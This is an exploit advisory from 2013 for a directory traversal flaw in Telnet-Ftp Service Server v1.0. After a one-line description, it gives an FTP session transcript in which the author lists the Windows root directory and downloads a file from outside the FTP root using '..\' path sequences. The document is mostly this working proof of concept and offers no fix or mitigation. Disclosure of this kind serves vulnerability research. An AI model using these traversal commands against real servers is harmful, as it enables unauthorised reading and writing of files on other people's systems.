# Exploit Title: Telnet-Ftp Service Server v1.0 Directory Traversal Vulnerability # Date Published: 2013/6/18 # Exploit Author: Chako # Software Link: http://telnet-ftp-server.en.softonic.com/ # Version: v1.0 (Build 1.218) # Tested on: Windows Xp SP3 English Description: ===================== A vulnerability has been identified in Telnet-Ftp Service Server v1.0, which allows attackers to read or write arbitrary files. Exploit: ===================== 220 FTP Server ready. Telnet-Ftp Server v. 1.0 (Build 1.218) User (127.0.0.1:(none)): chako 331 Password required for chako. Password: 230 User chako logged in. ftp> dir ..\..\..\..\ 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 WINDOWS drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Documents and Settings dr--r--r-- 1 ftp ftp 0 Jun 12 2012 Program Files -rw-rw-rw- 1 ftp ftp 0 Jun 12 2012 CONFIG.SYS -rwxrwxrwx 1 ftp ftp 0 Jun 12 2012 AUTOEXEC.BAT drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Python27 drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Perl drw-rw-rw- 1 ftp ftp 0 Sep 07 2012 eb83393ec0d8ee1eab4b219f drw-rw-rw- 1 ftp ftp 0 Jun 08 10:55 Win32 drw-rw-rw- 1 ftp ftp 0 Jun 08 12:46 tool drw-rw-rw- 1 ftp ftp 0 Jun 08 16:51 New Folder drw-rw-rw- 1 ftp ftp 0 Jun 08 23:22 TYPSoft FTP Server -rw-rw-rw- 1 ftp ftp 9 Jun 18 00:03 END -rw-rw-rw- 1 ftp ftp 0 Jun 18 00:04 Documents 226 File sent ok ftp: 933 bytes received in 0.00Seconds 933000.00Kbytes/sec. ftp> get ..\..\..\..\windows\hack.txt 200 Port command successful. 150 Opening data connection for ..\..\..\..\windows\hack.txt. 226 File sent ok ftp: 14 bytes received in 0.00Seconds 14000.00Kbytes/sec. ftp> !type hack.txt Hello~ World!~ftp>